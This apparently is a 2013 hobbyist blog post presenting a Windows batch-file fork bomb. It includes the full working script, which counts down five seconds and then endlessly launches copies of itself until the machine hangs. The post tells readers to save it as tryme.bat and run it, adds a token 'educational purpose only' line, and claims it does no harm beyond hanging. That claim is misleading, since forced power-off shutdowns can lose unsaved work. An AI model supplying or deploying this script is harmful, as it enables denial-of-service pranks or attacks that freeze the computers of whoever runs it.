Creative Destruction | Batch Hacks

29 Oct 2013

Ever tried to put windows to crawl? Let’s do it. This simple code is an infinite loop where each time it runs a copy of itself. The amount of computational power it requires increase exponentially. With an i5 configuration with descent RAM your PC will hang in seconds. You won’t even get time to kill the process or log off. One thing you can do is to shut you PC using your power button.  You will have 5 second timer. It will execute only after 5 seconds. It won’t do any harm to your PC other than hanging… Use it for educational purpose only…Save this file as tryme.bat and run it.

@echo off
color 04
set /a tm=%time:~6,2%+5
:time
cls
IF NOT %tm%==%time:~6,2% (
set /a remtime=%tm%-%time:~6,2%
echo you have %remtime% second to quit
goto time
)
:Danger
for %%i in (1,1,100000) do start tryme.bat
goto Danger



Comments